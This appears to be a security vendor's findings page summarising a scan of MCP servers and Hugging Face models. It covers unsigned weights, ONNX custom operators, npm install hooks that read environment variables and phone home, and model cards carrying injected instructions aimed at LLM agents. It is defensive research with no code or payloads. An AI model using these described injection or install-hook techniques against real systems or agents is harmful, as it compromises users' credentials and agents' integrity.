Oxvault Oxvault

Field Insights

What scanning real MCP servers and Hugging Face models actually finds — patterns, outliers, and takeaways from the public sweep.

Everything on this page is computed at build time from the same sweep-results.json that powers the results page — sweep v0.4.1 (2026-05-11, scanner v0.4.1): 112 artifacts (33 MCP servers, 79 Hugging Face models), 2,142 findings, 75% of artifacts had at least one.

1. Unsigned models are the norm, not the exception

aibom-signature-missing fired on 79 of 79 Hugging Face models in the sweep — including artifacts published by Microsoft, Facebook, and BAAI. Cryptographic provenance for model weights effectively does not exist in the wild today. Until OpenSSF Model Signing adoption catches up, the practical mitigation is content scanning plus hash pinning — which is exactly why the scanner treats a missing signature as a warning to track, not noise to suppress.

2. ONNX custom operators are where the volume hides

The single loudest rule in the sweep is aibom-onnx-custom-operator1,507 findings across 12 models (including small, widely-embedded models like SmolLM). A custom operator is a hook for native code the runtime must supply: it isn’t malware by itself, but it means “running this model” can mean “loading someone’s shared library”. If your inference stack auto-resolves custom ops, audit that path before the model, not after.

3. Criticals are rare — and that’s the point

Only 3 critical and 8 high findings came out of 112 artifacts. The criticals were concrete: a shell-command-injection pattern in a very popular MCP server, and an install hook reading the environment at npm install time — before any runtime guard could exist. Supply-chain risk is a tail-risk problem: the average artifact is fine, and the one that isn’t is running with your credentials. Scanning is cheap precisely because the base rate is low.

4. Install hooks are MCP’s blind spot

MCP security discussion focuses on runtime — tool poisoning, prompt injection, rug pulls. But the sweep’s standout MCP critical came from install-time behavior: lifecycle scripts that read process.env and phone home during npm install, before the server ever speaks JSON-RPC. A runtime gateway can’t see that. This is why the pipeline is scan before install (oxvault scan), then guard at runtime (Gateway).

5. Model cards are an injection surface

aibom-modelcard-suspicious-instructions fired on 7 models in the sweep — README/model-card text containing instruction-shaped content aimed at whatever LLM reads it. Model cards get pasted into agent context windows constantly. Treat every artifact’s metadata as untrusted input, not just its weights: the same tool-poisoning rules that guard MCP tool descriptions apply.

Honest footnotes

  • The warning count is dominated by signature-missing and custom-operator findings — systemic-hygiene signals, not 1,808 individual emergencies.
  • CVE detection (12/12) is measured against our own reproduction corpus of published MCP CVEs; precision (93%) is self-measured on this sweep. Both are reproducible from the scanner repo.

Want your server or model in the next sweep? Ask in Discord or open an issue on the scanner repo.